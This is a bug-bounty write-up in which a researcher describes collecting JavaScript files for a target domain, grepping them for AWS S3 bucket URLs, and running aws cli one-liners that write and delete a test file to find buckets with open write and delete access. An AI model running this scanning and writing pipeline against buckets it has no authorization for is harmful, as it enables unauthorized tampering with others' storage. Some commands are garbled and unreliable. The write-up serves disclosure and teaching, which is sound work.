How I was able Find mass leaked AWS s3 bucket from js File
My name is Santosh Kumar Sha, I’m a security researcher from India(Assam). In this article, I will be describing How I was able Find mass leaked AWS s3 bucket from js File.
SPECIAL COVID-19 Note:
Don’t go outside without any reason . Stay home be safe and also safe other. Special request to my fellow bug-bounty hunter Take care of your health and get vaccinated.
TOOLS used for the exploitation
1. Subfinder (https://github.com/projectdiscovery/subfinder)
2. httpx (https://github.com/projectdiscovery/httpx)
3. gau(Corben) — https://github.com/lc/gau
4. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls.
Story Behind the bug:
This is the write of my Recent bug that i found . While I was doing recon on js file. How I was able Find mass leaked AWS s3 bucket from js File.
Here it goes:
Suppose we assume the target name is example.com where every thing is in-scope like this:
In-scope : *.example.com
To gather all the subdomain from internet archives i have used subfinder , waybackurls tool and gau.
subfinder -d example.com silent | httpx |subjs
gau -subs example.com | grep ‘.js$’
waybackurls example.com | grep ‘.js$’
So the chance of missing the js file still exist so in-order to be ahead of the game I don’t want to miss any js file for testing so I used subfinder and pipe to waybackurls to get all the js file for all the subdomain if exist and save it to a file.
So the final command will look like this:
gau -subs example.com | grep ‘.js$’ >> vul1.txt
waybackurls example.com | grep ‘.js$’ >> vul2.txt
subfinder -d example.com -silent | | httpx |subjs>> vul3.txt
Now collecting all js file in one and sorting out the duplicates
cat vul1.txt vul2.txt vul3.txt | sort -u >> unique_sub.txt
NOW the actual js file recon start:
Now as js file has a huge resource of data and doing js file recon is an time consume task to filter out the information the target. As files are huge any read each js file one after another is an impossible task. So the used my bash skill to extraction data from each file.I used curl command to read each file and grep out any leaked AWS s3 bucket leaked in that. SO the syntax i used was like this below
cat vul3.txt | xargs -I% bash -c ‘curl -sk “%” | grep -w “*.s3.amazonaws.com”’ >> s3_bucket.txt
cat vul3.txt | xargs -I% bash -c ‘curl -sk “%” | grep -w “*.s3.us-east-2.amazonaws.com”’ >> s3_bucket.txt
cat vul3.txt | xargs -I% bash -c ‘curl -sk “%” | grep -w “s3.amazonaws.com/*”’ >> s3_bucket.txt
cat vul3.txt | xargs -I% bash -c ‘curl -sk “%” | grep -w “s3.us-east-2.amazonaws.com/*”’ >> s3_bucket.txt
Now I collected all the aws s3 bucket url and then saved it to a file as s3_bucket.txt.
Now once we have all the s3 aws bucket url then we will collect the s3 buck name. Below is the command to get all the s3 bucket name from the url or u can manually clean it.
cat s3_bucket.txt | sed ‘s/s3.amazonaws.com//’ >> bucket_name.txt
cat s3_bucket.txt | sed ‘s/s3.us-east-2.amazonaws.com//’ >> bucket_name.txt
Now How I was able to find mass AWS s3 bucket with write and delete permission:
So there how i was able to automate the AWS s3 bucket scanning process for write and delete permission.
As I have already collected the s3 bucket from js file and stored it on a file name as “bucket_name.txt”.
Now using aws cli command we will automated the process:
cat bucket_name.txt |xargs -I% sh -c ‘aws s3 cp test.txt s3://% 2>&1 | grep “upload” && echo “ AWS s3 bucket takeover by cli %”’
cat bucket_name.txt |xargs -I% sh -c ‘aws s3 rm test.txt s3://%/test.txt 2>&1 | grep “delete” && echo “ AWS s3 bucket takeover by cli %”’
I Finally got 6 more aws s3 bucket with with write and delete permission.
I quickly reported the bug and in the next day the report was triage to critical
After seeing this my reaction …
I’m sure that a lot of security researcher had already see there process but this How I approach to Find mass leaked AWS s3 bucket from js File. So doing recon is pretty handle you may not what your missing out.
That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability.